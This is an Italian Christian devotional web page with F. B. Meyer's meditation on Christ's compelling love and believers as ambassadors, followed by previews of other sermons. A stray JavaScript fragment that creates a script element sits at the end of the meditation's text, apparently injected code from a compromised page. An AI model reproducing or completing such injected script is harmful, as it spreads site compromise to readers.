Meditazione del giorno: Costrizione d’amore

di F. B. MEYER  –  “L’amore di Cristo ci costringe …. facciamo da ambasciatori per Cristo, come se Dio esortasse per mezzo nostro.” – (2 Corinzi  5,14-20.)  –   Un ambasciatore può vivere in un paese straniero, ma non fa parte di quel paese. Lui lì è il rappresentare del suo paese, e non gli è consentito di portare avanti nessun interesse di tipo personale. Noi dobbiamo rappresentare Cristo al mondo. La parola “costringe” suggerisce una pressione costante, una spinta, come quando l’acqua è forzata lungo un determinato condotto. Paolo dice: “Io agisco così perché sono sotto il fascino di una potente imposizione, non posso fare altro, non sono padrone di me stesso Non mi meraviglio che ciò possa apparire  insolito e stravagante.  Attribuisco la mia eccentricità a Cristo – il suo amore mi trascina, e mi porta avanti.”

Cosa intende con “l’amore di Cristo?” E’ il suo per noi , o il nostro per Lui? È impossibile fare questa distinzione, perché sono uno. Come la luce del sole colpisce la luna, e si riflette sulla terra, così l’amore che abbiamo per Cristo, o per l’uomo, è il riflesso del Suo amore per noi. Tutto l’amore nei nostri cuori freddi e senza amore è l’emanazione e il riflesso dell’Amore che è partito da Lui, è stato mediato a noi al Calvario, e si riflette da noi, come la luce del sole in uno specchio.

L’amore di Cristo non costringe tutti i  cristiani, perché non tutti comprendono il profondo significato della Croce, ma quando l’anima arriva ad apprezzare questo, e passa per la porta della morte nella vita di Dio, allora comincia a sentire la costrizione dell’amore di Cristo.

Il perno della nostra vita deve essere il Cristo risorto: “Noi non viviamo più per noi stessi, ma per Colui che è risorto”. A volte sentiamo persone descritte come eccentriche – fuori dal centro. Un uomo è eccentrico per il mondo quando è concentrico con Cristo. E’ così che si diventa una nuova creazione. Quando per fede noi siamo uniti a Gesù Cristo nella Sua Croce e nella sua morte, la transizione è compiuta. Passiamo oltre, nella vita di Pasqua. Egli ci ha riconciliato a Sé, e ha dato a noi il ministero della riconciliazione – quindi siamo ambasciatori. Dobbiamo proclamare il perdono per il peccatore, la rottura delle catene dei prigionieri, e l’approssimarsi della salvezza a tutti (Isaia 52:7-10).var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

CHI E' COSTUI?

di ROBERTO BRACCO – Coloro che avevano risposto all’appello del Maestro divino, che lo avevano seguito, che erano entrati nelle file dei suoi discepoli, avevano avuta la possibilità più degli altri di vedere le opere, di udire le parole di Cristo. La potenza soprannaturale del Redentore era stata messa in azione davanti a loro attraverso molteplici circostanze ed essi avevano veduto miracoli, guarigioni, liberazioni. Erano passati di meraviglia …
Leggi Tutto

LE COMPASSIONI DI DIO

di Agostino Masdea   –  E Gesù, sbarcato, vide una grande folla e ne ebbe compassione, perché erano come pecore senza pastore, e prese a insegnare loro molte cose. (Marco 6:34) La visione che si prospettò davanti al Signore quando discese dalla barca in questo passo dell’evangelo di Marco è simile a quella che si presenta davanti ai nostri occhi ogni giorno: folle immense di uomini che vanno e …
Leggi Tutto

"Umiltà: il Cuore di un Servo"

AGOSTINO MASDEA: “Umiltà: il Cuore di un Servo” – Sermone sul testo di Filippesi 2:1-11  ” 1 Se dunque vi è qualche consolazione in Cristo, qualche conforto d’amore, qualche comunione di Spirito, qualche tenerezza e compassione, 2 rendete perfetta la mia gioia, avendo uno stesso modo di pensare, uno stesso amore, un solo accordo e una sola mente 3 non facendo nulla per rivalità o vanagloria, ma con umiltà, ciascuno di voi stimando …
Leggi Tutto

Domenica 10 Marzo 2013 - Pastore Lorenzo Agnes

LO SPIRITO SANTO DIMORA IN NOI Lorenzo Agnes è pastore della Chiesa CALVARY TABERNACLE A Schenectady 840 Albany Street New York, 12304,    Predicazione di Domenica 10 Marzo 2013 – …
Leggi Tutto

Da  D. L. Moody a Billy Graham. Tutto iniziò in un negozio di scarpe...

UNA STORIA SIGNIFICATIVA.  –  Un sabato qualsiasi a Boston, circa 150 anni fa, un tranquillo insegnante di scuola domenicale di  nome Edward Kimball si prese un giorno libero per andare a trovare ogni ragazzo della sua classe. Voleva essere certo che ciascuno avesse ricevuto Cristo. Uno dei suoi studenti lavorava come apprendista nel negozio di scarpe dello zio. Kimball entrò nel negozio ed andò nel magazzino sul retro, …
Leggi Tutto

Avvertimenti utili a quei membri di chiesa che non vivono in Cristo

di CHARLES H. SPURGEON – L’apostolo Paolo ci offre il modello perfetto di un uomo sinceramente consacrato. Pastore vigilante, si preoccupava incessantemente del gregge affidato alle sue cure e non si limitava a predicare l’Evangelo, ne pensava di aver fatto tutto il suo dovere annunziando la salvezza; ma i suoi occhi era?no sempre aperti sulle Chiese che ave?va fondato, seguendo con vivo interesse i loro progressi spirituali o …
Leggi Tutto

La sostituzione che cambiò il mondo

di ZAC POONEN    –  «Colui che non ha conosciuto peccato, egli lo ha fatto diventare peccato per noi, affinché noi diventassimo giustizia di Dio in lui.» 2° Corinzi 5:21   –  L a Bibbia rivela che, quando Gesù morì sulla croce per noi, Egli ci sostituì occupando il nostro posto. Cristo è diventato peccato per noi, affinché noi diventassimo giustizia per Dio. Questo scambio si chiama giustificazione, …
Leggi Tutto

L'UNICA VIA

di OSWALD J. SMITH – Un banchiere ed un industriale sedevano l’uno di fronte all’altro negli uffici della banca. L’industriale parlava molto animatamente, quando all’improvviso l’altro interruppe. “Ridicolo! Assurdo! Pazzesco!” esclamò l’orgoglioso banchiere, atteggiando le sue labbra allo scherno. “Ma perché”? chiese il suo interlocutore. “Perché”? E voi, uomo ben pensante, chiedete il perché? Le vostro sono delle sciocchezze!” rispose, deridendolo. “Ebbene “ ribattè l’altro “vi chiedo proprio: Perché?!?” La …
Leggi Tutto

Dai nostri Culti